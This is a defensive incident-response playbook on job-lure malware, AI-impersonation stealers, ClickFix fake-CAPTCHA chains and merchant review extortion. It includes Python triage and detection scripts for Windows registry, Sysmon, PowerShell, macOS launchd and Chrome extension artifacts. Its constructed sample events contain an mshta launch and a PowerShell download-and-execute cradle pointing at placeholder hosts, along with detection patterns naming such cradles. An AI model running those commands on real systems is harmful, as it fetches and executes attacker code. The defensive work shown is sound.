IR playbook: triaging Google’s November 2025 fraud advisory (AI impersonation, job-lure malware, and review extortion)

A hands-on incident-response guide that turns Google’s November 6, 2025 scams advisory into concrete intrusion flows, artifacts to pull,...

Google’s Trust & Safety team published a new scams advisory on November 6, 2025 that highlights three trends DFIR teams will encounter in the wild: job-lure campaigns that deliver RATs and info-stealers, negative-review extortion of merchants, and AI-product impersonation across apps, extensions, and malvertising chains (Google, Nov 6, 2025). The advisory also notes a rollout of a direct merchant extortion reporting flow and calls out protections in Chrome/Play you’ll see on endpoints during triage (Google).

Intrusion Flow

  • Job-lure malware via “interview software” or test projects

    • Initial approach: fake recruiters set up interviews and send “camera/meeting” installers or trojanized projects (e.g., BeaverTail downloader leading to InvisibleFerret backdoor) on Windows and macOS (Palo Alto Unit 42). Sekoia observed 2025 “ClickFake Interview” activity linked to Lazarus that deploys GolangGhost across Windows/macOS under interview pretexts (Sekoia). ESET reporting also ties Lazarus job-lures to RAT deployment in defense/crypto sectors (TechRadar citing ESET).
    • Objectives: credential and wallet theft, remote control, and footholds for lateral movement (BeaverTail/InvisibleFerret support info-stealing and backdoor ops) (Unit 42).
  • AI-product impersonation and compromised extensions

    • Distribution: cloaked malvertising/SEO, hijacked social accounts, and extension account takeovers that deliver info-stealers (e.g., Lumma) or backdoors (e.g., PipeMagic) while pretending to be “ChatGPT/AI” tools (Microsoft Security; Malwarebytes; TechRadar). Microsoft and partners also disrupted Lumma in May 2025 (394k+ infected Windows systems in two months), but affiliates continue to pivot distribution (email, malvertising, fake updates) (Microsoft DCU).
  • “ClickFix” fake-CAPTCHA chains

    • Flow: victims click an “I’m not a robot” panel that copies a command to clipboard and instructs Win+R paste/enter (mshta/PowerShell), executing a downloader for info-stealers/RATs (Microsoft Security). A campus-wide incident on iClicker showed this pattern; guidance to consider systems compromised and reimage circulated after the compromise window (BleepingComputer). Kaspersky tracked similar malvertising→fake-CAPTCHA redirections to stealers (Kaspersky). Abuse of mshta (ATT&CK T1218.005) to run HTA/remote scripts is long-established and should be assumed when you see Win+R/run-box execution (CISA/ATT&CK).
  • Review-bomb extortion of merchants

    • Pattern: coordinated one-star “review-bombing” followed by off-platform payment demands; Google says this violates Maps policies (fake engagement, harassment, extortion) and is rolling out a direct merchant extortion report flow (Google advisory; Maps UGC policy). FTC also documents how to report suspicious reviews from consumer and business sides (FTC).

Key Artifacts to Pull

  • Windows execution and scripting

    • Security/Sysmon: Event 4688 process creation and Sysmon EID 1/3/12-13 for process, network, and registry writes (Microsoft Learn; Sysmon docs; EventSentry EID 3; Event 1).
    • PowerShell logging: enable and collect Module (4103) and Script Block (4104) logs for deobfuscated payloads (PowerShell Blue Team; Learn 4104 refs).
    • Run box and GUI execution traces: RunMRU (HKCU…\Explorer\RunMRU) and UserAssist (HKCU…\Explorer\UserAssist) for Win+R patterns like mshta/powershell launches (Splunk analytic; RootGuard).
    • Evidence of program installation/use: Prefetch (C:\Windows\Prefetch) for last runs/referenced files; note server/SSD caveats (Forensics Wiki). Amcache (C:\Windows\AppCompat\Programs\Amcache.hve) and ShimCache (SYSTEM\…\AppCompatCache) for existence/first-run/metadata correlation (windowsforensics.net; Magnet Forensics).
  • Browser and extension evidence

    • Chrome extension stores (per-profile): Windows %LocalAppData%\Google\Chrome\User Data\Default\Extensions, macOS ~/Library/Application Support/Google/Chrome/Default/Extensions (Forensics Wiki). Review install/update provenance against Chrome’s external-install requirements (Win/macOS external installs must come from Chrome Web Store) (Chrome dev docs).
  • macOS persistence and telemetry

    • LaunchAgents/LaunchDaemons for user/system persistence: ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons (Apple dev docs).
    • Unified Logs parsing for installer, quarantine decisions, and persistence activity (parse locally or from collected logarchives) (Mandiant macOS UnifiedLogs).
  • Campaign-specific network IOCs

    • If job-lure indicators are present, include searches for BeaverTail/InvisibleFerret infra and Lazarus interview lure sites (per vendor IOCs); Censys observed several BeaverTail C2 ports recurring (1224, 1225, 3000); treat these as hunting leads, not block-all lists (Censys).
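The RunMRU and UserAssist artifacts above are small enough to parse by hand, and the two gotchas worth showing are that RunMRU recency comes from the MRUList value (not from the slot letters) and that UserAssist value names are ROT13-encoded with the run count and last-run FILETIME at fixed offsets (Windows 7+ 72-byte layout: run count at offset 4, FILETIME at offset 60). The following Python is an added example written for this playbook, not tooling from Google or any vendor cited here; the RunMRU export and UserAssist records are constructed in-line, and the known-folder GUID prefixes that real UserAssist names often carry are left untouched rather than resolved.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

# Binaries that rarely belong in a user's own Win+R history
RUNBOX_LOLBINS = {"mshta", "powershell", "pwsh", "cmd", "wscript", "cscript",
                  "rundll32", "regsvr32", "certutil", "curl", "bitsadmin"}

# Constructed RunMRU key export (value name -> data); not taken from a real host.
# Windows appends "\1" to each entry; MRUList lists slots most-recent-first.
RUNMRU = {
    "a": "notepad\\1",
    "b": "mshta https://verify.example.invalid/captcha.hta\\1",
    "c": "calc\\1",
    "MRUList": "bca",
}


def parse_runmru(key):
    """Return RunMRU entries in MRUList (recency) order with the trailing '\\1'
    removed and the launched binary checked against RUNBOX_LOLBINS."""
    entries = []
    for slot in key.get("MRUList", ""):
        data = key.get(slot)
        if data is None:
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        parts = cmd.split()
        exe = parts[0].lower().rsplit("\\", 1)[-1] if parts else ""
        exe = exe[:-4] if exe.endswith(".exe") else exe
        entries.append({"slot": slot, "command": cmd, "lolbin": exe in RUNBOX_LOLBINS})
    return entries


FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME counts 100-ns intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def make_userassist_entry(path, run_count, focus_count, last_run):
    """Build a constructed 72-byte UserAssist value for testing (Windows 7+ layout):
    session id at 0, run count at 4, focus count at 8, focus time at 12,
    last-run FILETIME at 60. The value name is the ROT13 of the path."""
    ft = ((last_run - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10
    data = (struct.pack("<IIII", 0, run_count, focus_count, 0) + b"\x00" * 44
            + struct.pack("<Q", ft) + b"\x00" * 4)
    return codecs.encode(path, "rot_13"), data


# Constructed UserAssist records (not real telemetry)
USERASSIST = dict([
    make_userassist_entry(r"C:\Windows\System32\mshta.exe", 1, 1,
                          datetime(2025, 11, 7, 10, 0, 2, tzinfo=timezone.utc)),
    make_userassist_entry(r"C:\Windows\System32\notepad.exe", 14, 9,
                          datetime(2025, 11, 6, 16, 20, 0, tzinfo=timezone.utc)),
])


def parse_userassist(values):
    """Decode ROT13 names plus run count and last-run time, newest first."""
    out = []
    for name, data in values.items():
        if len(data) < 68:
            continue  # short/legacy record: no FILETIME at offset 60
        run_count = struct.unpack_from("<I", data, 4)[0]
        ft = struct.unpack_from("<Q", data, 60)[0]
        out.append({"path": codecs.decode(name, "rot_13"), "run_count": run_count,
                    "last_run": filetime_to_datetime(ft) if ft else None})
    return sorted(out, key=lambda r: r["last_run"] or FILETIME_EPOCH, reverse=True)


def runbox_timeline(runmru, userassist):
    """Join each Win+R entry to its UserAssist last-run time by executable name,
    giving the run-box command a timestamp RunMRU itself does not record."""
    ua_by_exe = {r["path"].rsplit("\\", 1)[-1].lower(): r for r in parse_userassist(userassist)}
    rows = []
    for e in parse_runmru(runmru):
        parts = e["command"].split()
        exe = parts[0].lower().rsplit("\\", 1)[-1] if parts else ""
        exe = exe if exe.endswith(".exe") else exe + ".exe"
        ua = ua_by_exe.get(exe)
        rows.append({**e, "last_run": ua["last_run"] if ua else None})
    return rows


if __name__ == "__main__":
    for row in runbox_timeline(RUNMRU, USERASSIST):
        print(row)
```

Pointing this at a live system means exporting the two keys from the user's NTUSER.DAT (offline) rather than the live hive, and keeping in mind that RunMRU only holds the last 26 slots, so a timestamp from UserAssist or a 4688/Sysmon event is still needed to place the command in the timeline.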
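For the macOS persistence artifacts, the practical question during triage is which of the dozens of LaunchAgent/LaunchDaemon plists on a host deserve a look first. The Python below is an added example for this playbook (not Apple or Mandiant code) that scores each plist with simple heuristics: a program path outside the usual system/application locations, arguments referencing hidden or temp directories, a shell or script interpreter as the launch target, auto-start keys (RunAtLoad/KeepAlive/StartInterval), and a com.apple.* label for a job that does not live under /System. The two plists are constructed with plistlib and are not from a real incident.

```python
import os
import plistlib

# Locations legitimately installed launchd jobs normally execute from
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/", "/Applications/")
# User-writable or hidden locations commonly used by dropped agents
SUSPECT_MARKERS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/", "/.")
INTERPRETERS = {"sh", "bash", "zsh", "python3", "osascript", "curl"}


def triage_launchd_plist(data, path="<constructed>"):
    """Score one LaunchAgent/LaunchDaemon plist (bytes) with persistence heuristics.
    `path` is where the plist was collected from; it feeds the label check."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # malformed plist: report it rather than skip it
        return {"path": path, "label": None, "target": None, "flags": {},
                "score": 0, "error": str(exc)}
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    target = str(plist.get("Program") or (args[0] if args else ""))
    joined = " ".join(args) if args else target
    flags = {
        "untrusted_path": bool(target) and not target.startswith(TRUSTED_PREFIXES),
        "suspect_location": any(m in joined for m in SUSPECT_MARKERS),
        "interpreter_target": os.path.basename(target) in INTERPRETERS,
        "autostart": bool(plist.get("RunAtLoad")) or bool(plist.get("KeepAlive"))
                     or "StartInterval" in plist,
        # Apple's own jobs ship under /System/Library; a com.apple.* label elsewhere is odd
        "apple_label_outside_system": label.startswith("com.apple.") and not path.startswith("/System/"),
    }
    return {"path": path, "label": label, "target": target,
            "flags": flags, "score": sum(flags.values())}


def triage_many(items):
    """items: iterable of (path, plist_bytes). Returns results highest score first."""
    return sorted((triage_launchd_plist(d, p) for p, d in items),
                  key=lambda r: r["score"], reverse=True)


# Constructed samples (not collected from a real host)
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.helper",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper", "--check"],
    "RunAtLoad": True,
})
SUSPECT_PLIST = plistlib.dumps({
    "Label": "com.apple.softwareupdate.helper",
    "ProgramArguments": ["/bin/sh", "-c", "/Users/jdoe/.cache/.meet/agent"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
SAMPLES = [
    ("/Library/LaunchAgents/com.example.helper.plist", BENIGN_PLIST),
    ("/Users/jdoe/Library/LaunchAgents/com.apple.softwareupdate.helper.plist", SUSPECT_PLIST),
]


if __name__ == "__main__":
    for r in triage_many(SAMPLES):
        print(r["score"], r["path"], r["target"], [k for k, v in r["flags"].items() if v])
```

On a collected image, feed `triage_many` the plist files from the three directories listed above (plus ~/Library/LaunchDaemons if present); the score is a prioritisation aid, so a high-scoring item still needs its target binary pulled and its launch confirmed in the Unified Logs.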

Detection Notes

  • ClickFix/mshta/PowerShell

    • Hunt mshta executing URLs or scriptlets and any networked mshta children:
      • Sysmon EID 1: Image=mshta.exe AND (CommandLine contains http OR vbscript: OR javascript:) (pivot to EID 3 for egress) (Sysmon docs; CISA/ATT&CK).
    • PowerShell 4104 heuristics: Base64 decode, DownloadString/Invoke-WebRequest/iwr/Start-BitsTransfer; correlate to 4688 parent explorer.exe within a minute of RunMRU change (PowerShell Blue Team; Learn).
    • Registry analytics: alert on additions to HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU values (exclude MRUList) (Splunk analytic).
  • AI-impersonation and stealer delivery

    • Watch for browser-origin child processes spawning mshta/powershell/cmd with web arguments; pair with Sysmon EID 3 to untrusted destinations (no corporate egress tags) (Sysmon EID 1/3, EID 3).
    • Extension hygiene: enumerate new/unknown extension IDs in profile Extension folders and compare to allowlists; cross-check if installed via approved Web Store per Chrome policy (Win/macOS should not allow external CRX installs) (Chrome dev docs).
    • Lumma affiliate tradecraft: ClickFix redirections (Prometheus TDS → ClickFix page → mshta/PowerShell chain) and mixed payloads (XWorm+Lumma); hunt for mshta→PowerShell→EXE sequence and staged JS/PS downloads as documented by Microsoft (Microsoft Security).
  • Job-lure specifics

    • Process lineage from meeting apps/installers (e.g., fake video/camera software) to networked backdoors; look for trojanized interview apps named for meeting tools (e.g., MiroTalk/FreeConference) and Qt-based loaders on Windows/macOS (Unit 42). Lazarus sub-campaigns used similar interview lures across OSes (Sekoia).
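The three ClickFix detections above (mshta with a URL or script: protocol, 4104 download/encoded-command heuristics, and the RunMRU-write-to-explorer-child correlation) are easy to express as a few functions over normalised events, which also makes it clear what each rule needs from the telemetry. The following Python is an added example for this playbook, not Microsoft, Splunk or Sysmon code; the events are constructed, the field names (Image, ParentImage, CommandLine, TargetObject, Details, ScriptBlockText) follow Sysmon/4104 naming as an assumption about how the SIEM has parsed them, and the 60-second window is a starting point rather than a tuned value.

```python
import re
from datetime import datetime

# Constructed sample telemetry (not real events). Field names follow Sysmon
# (EID 1/3/13) and PowerShell 4104 conventions; "ts" is ISO-8601 local time.
EVENTS = [
    {"eid": 13, "ts": "2025-11-07T10:00:00", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": "mshta https://verify.example.invalid/captcha.hta\\1"},
    {"eid": 13, "ts": "2025-11-07T10:00:00", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList",
     "Details": "a"},
    {"eid": 1, "ts": "2025-11-07T10:00:02", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://verify.example.invalid/captcha.hta"},
    {"eid": 3, "ts": "2025-11-07T10:00:03", "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"eid": 4104, "ts": "2025-11-07T10:00:05",
     "ScriptBlockText": "$u='https://verify.example.invalid/s.ps1';IEX (New-Object Net.WebClient).DownloadString($u)"},
    {"eid": 1, "ts": "2025-11-07T10:05:00", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"eid": 4104, "ts": "2025-11-07T10:06:00", "ScriptBlockText": "Get-ChildItem C:\\Users"},
]

MSHTA_TOKENS = ("http", "vbscript:", "javascript:")
# Download cradles and encoded-command switches commonly seen in 4104 blocks
PS_PATTERN = re.compile(
    r"downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|frombase64string|-enc(odedcommand)?\b",
    re.I)


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def mshta_remote_launches(events):
    """Sysmon EID 1: mshta.exe with a URL or script: protocol on the command line."""
    return [e for e in events
            if e["eid"] == 1 and _basename(e["Image"]) == "mshta.exe"
            and any(t in e["CommandLine"].lower() for t in MSHTA_TOKENS)]


def mshta_egress(events, window_s=60):
    """Pivot: pair each flagged mshta launch with EID 3 egress from mshta.exe within window_s."""
    pairs = []
    for launch in mshta_remote_launches(events):
        for e in events:
            if (e["eid"] == 3 and _basename(e["Image"]) == "mshta.exe"
                    and 0 <= (_ts(e) - _ts(launch)).total_seconds() <= window_s):
                pairs.append((launch["CommandLine"], f'{e["DestinationIp"]}:{e["DestinationPort"]}'))
    return pairs


def suspicious_scriptblocks(events):
    """PowerShell 4104: return (timestamp, matched indicators) for each hit."""
    hits = []
    for e in events:
        if e["eid"] != 4104:
            continue
        found = {m.group(0).lower() for m in PS_PATTERN.finditer(e["ScriptBlockText"])}
        if found:
            hits.append((e["ts"], sorted(found)))
    return hits


def runmru_to_process(events, window_s=60):
    """Correlate a RunMRU value write (EID 13, MRUList excluded) with a process
    whose parent is explorer.exe (EID 1 or 4688) within window_s seconds."""
    writes = [e for e in events if e["eid"] == 13
              and "\\explorer\\runmru\\" in e["TargetObject"].lower()
              and not e["TargetObject"].lower().endswith("\\mrulist")]
    matches = []
    for w in writes:
        value = w["Details"][:-2] if w["Details"].endswith("\\1") else w["Details"]
        for e in events:
            if (e["eid"] in (1, 4688) and _basename(e.get("ParentImage", "")) == "explorer.exe"
                    and 0 <= (_ts(e) - _ts(w)).total_seconds() <= window_s):
                matches.append((value, _basename(e["Image"])))
    return matches


if __name__ == "__main__":
    print("mshta egress:", mshta_egress(EVENTS))
    print("4104 hits:", suspicious_scriptblocks(EVENTS))
    print("RunMRU -> process:", runmru_to_process(EVENTS))
```

The RunMRU correlation is the one that separates a user typing a ClickFix command from a script launching the same binary, because the run box writes the registry value before explorer.exe spawns the child; in a SIEM this becomes a join on host and user with the same window.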

Response Guidance

  • Endpoint containment and rebuild decisions

    • If a user completed Win+R ClickFix steps (mshta/PowerShell) or executed a fake interview app, isolate immediately, collect volatile data/logs, and strongly consider a wipe/reimage plus password resets due to stealer risk. This mirrors guidance circulated during the iClicker incident (BleepingComputer).
    • Rotate credentials, invalidate browser sessions and OAuth tokens, and audit saved browser passwords due to stealer exposure (Microsoft Security).
  • Merchant extortion cases

    • Do not engage or pay. Preserve chat logs, screenshots of reviews, and timestamps. File reports via Google’s merchant extortion reporting flow and cite policy violations (fake engagement/harassment) (Google advisory; Maps policy). Also file at IC3 for criminal extortion documentation (IC3) and follow FTC’s guidance for flagging reviews (FTC).
  • Controls to reduce recurrence

    • Ensure Script Block logging is enabled and centrally collected (and tuned to avoid drowning your SIEM) (PowerShell Blue Team). Enable and tune Sysmon for process/registry/network coverage (Sysmon docs).
    • Browser hardening: restrict extension installs to Web Store and enforce allowlists, audit profiles for unknown IDs, and monitor for externally-installed extensions (Win/macOS policy) (Chrome dev docs).
    • Security awareness tailored to hiring and AI tooling: require official app stores/downloads; forbid “run this command to verify you’re human”; prohibit installers sent over chat/social; validate interview app instructions via official company domains (Google advisory).
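The extension checks recur three times above: the per-profile Extensions folder as an artifact, the "enumerate new/unknown extension IDs and compare to allowlists" detection, and the "audit profiles for unknown IDs" control. One small audit routine serves all three. The Python below is an added example for this playbook and not Chrome or Google tooling; it walks `<profile>/Extensions/<id>/<version>/manifest.json`, checks the ID format (Chrome IDs are 32 characters from a to p), flags IDs missing from an allowlist, treats a manifest without the Web Store update URL as a possible sideload to confirm against the profile's Preferences, and lists risky permissions. The profile it audits is a constructed fixture built in a temporary directory; the IDs and extension names in it are made up.

```python
import json
import os
import re
import tempfile

EXTENSION_ID = re.compile(r"^[a-p]{32}$")  # Chrome extension IDs: 32 chars, a-p only
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"
RISKY_PERMISSIONS = {"<all_urls>", "webRequest", "webRequestBlocking", "cookies", "tabs",
                     "history", "clipboardRead", "nativeMessaging", "debugger", "proxy"}


def audit_profile(profile_root, allowlist):
    """Enumerate <profile>/Extensions/<id>/<version>/manifest.json and report, per
    extension version: malformed ID, not in allowlist, non-Web-Store update_url
    (sideload suspect), and any risky permissions requested."""
    findings = []
    ext_dir = os.path.join(profile_root, "Extensions")
    if not os.path.isdir(ext_dir):
        return findings
    for ext_id in sorted(os.listdir(ext_dir)):
        id_dir = os.path.join(ext_dir, ext_id)
        if not os.path.isdir(id_dir):
            continue
        for version in sorted(os.listdir(id_dir)):
            manifest = {}
            try:
                with open(os.path.join(id_dir, version, "manifest.json"), encoding="utf-8") as fh:
                    manifest = json.load(fh)
            except (OSError, ValueError):
                pass  # unreadable manifest is itself reported below
            perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
            findings.append({
                "id": ext_id,
                "version": version,
                "name": manifest.get("name", "<unreadable manifest>"),
                "malformed_id": EXTENSION_ID.match(ext_id) is None,
                "not_allowlisted": ext_id not in allowlist,
                "sideload_suspect": manifest.get("update_url") != WEBSTORE_UPDATE_URL,
                "risky_permissions": sorted(perms & RISKY_PERMISSIONS),
            })
    return findings


# Constructed fixture: these IDs are made up and only match the ID format
APPROVED_ID = "abcdefghijklmnopabcdefghijklmnop"
UNKNOWN_ID = "ponmlkjihgfedcbaponmlkjihgfedcba"


def build_fixture(root):
    """Write a fake Chrome profile: one approved extension, one unknown 'AI helper'
    with broad permissions and no update_url, and a directory with an invalid ID."""
    def write(ext_id, version, manifest):
        d = os.path.join(root, "Extensions", ext_id, version)
        os.makedirs(d)
        if manifest is not None:
            with open(os.path.join(d, "manifest.json"), "w", encoding="utf-8") as fh:
                json.dump(manifest, fh)
    write(APPROVED_ID, "2.1.0_0", {"name": "Approved Tool", "version": "2.1.0",
                                    "update_url": WEBSTORE_UPDATE_URL, "permissions": ["storage"]})
    write(UNKNOWN_ID, "1.0_0", {"name": "ChatGPT Helper", "version": "1.0",
                                 "permissions": ["cookies", "tabs", "webRequest"],
                                 "host_permissions": ["<all_urls>"]})
    write("notanextension", "1.0_0", None)


def demo():
    """Build the fixture in a temp dir and audit it against a one-entry allowlist."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return audit_profile(tmp, allowlist={APPROVED_ID})


if __name__ == "__main__":
    for f in demo():
        print(f)
```

For a real host, call `audit_profile` on each profile directory under the User Data path given in the artifacts section (Default, Profile 1, and so on) and feed the allowlist from the ExtensionInstallAllowlist policy you already enforce; an ID that fails the format check or lacks the Web Store update URL is the first thing to hash and look up.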

Takeaways

Sources / References